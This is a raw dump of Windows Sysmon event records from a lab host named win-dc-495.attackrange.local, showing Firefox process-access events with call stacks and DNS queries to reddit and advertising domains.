Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.613{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.566{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.566{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.566{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.504{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.472{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.472{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.472{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.447{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.447{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.447{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.300{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.300{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.269{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.582{59A5CD1D-945A-6005-3305-00000000A301}7052watch.redd.it0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.427{59A5CD1D-945A-6005-3305-00000000A301}7052id.rlcdn.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.426{59A5CD1D-945A-6005-3305-00000000A301}7052id.rlcdn.com034.120.207.148;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.425{59A5CD1D-945A-6005-3305-00000000A301}7052id.rlcdn.com0::ffff:34.120.207.148;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.114{59A5CD1D-945A-6005-3305-00000000A301}7052www-googletagmanager.l.google.com02a00:1450:4001:802::2008;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.112{59A5CD1D-945A-6005-3305-00000000A301}7052www-googletagmanager.l.google.com0142.250.74.200;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.112{59A5CD1D-945A-6005-3305-00000000A301}7052www.googletagmanager.com0type: 5 www-googletagmanager.l.google.com;::ffff:142.250.74.200;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.981{59A5CD1D-8E56-6005-2E00-00000000A301}2464168.114.84.104.in-addr.arpa.0type: 12 a104-84-114-168.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 10341000x800000000000000017726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.097{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.707{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.707{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.300{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.238{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.423{59A5CD1D-945A-6005-3305-00000000A301}7052reddit-d.openx.net0::ffff:34.98.64.218;::ffff:35.244.159.8;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.245{59A5CD1D-945A-6005-3305-00000000A301}7052pagead2.googlesyndication.com0type: 5 pagead46.l.doubleclick.net;::ffff:172.217.22.66;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.712{59A5CD1D-945A-6005-3305-00000000A301}7052pagead-googlehosted.l.google.com02a00:1450:4001:821::2001;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.710{59A5CD1D-945A-6005-3305-00000000A301}7052pagead-googlehosted.l.google.com0216.58.207.65;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.709{59A5CD1D-945A-6005-3305-00000000A301}7052d374b609c84e896b78ac3e4ad36ed706.safeframe.googlesyndication.com0type: 5 pagead-googlehosted.l.google.com;::ffff:216.58.207.65;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.687{59A5CD1D-945A-6005-3305-00000000A301}7052tpc.googlesyndication.com02a00:1450:4001:818::2001;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.685{59A5CD1D-945A-6005-3305-00000000A301}7052tpc.googlesyndication.com0216.58.212.161;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.685{59A5CD1D-945A-6005-3305-00000000A301}7052tpc.googlesyndication.com0::ffff:216.58.212.161;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.031{59A5CD1D-8E56-6005-2E00-00000000A301}2464200.74.250.142.in-addr.arpa.0type: 12 fra24s02-in-f8.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000017756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.029{59A5CD1D-8E56-6005-2E00-00000000A301}2464148.207.120.34.in-addr.arpa.0type: 12 148.207.120.34.bc.googleusercontent.com;C:\Windows\sysmon64.exe 22542200x800000000000000017755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.008{59A5CD1D-8E56-6005-2E00-00000000A301}2464194.74.250.142.in-addr.arpa.0type: 12 fra24s02-in-f2.1e100.net;C:\Windows\sysmon64.exe 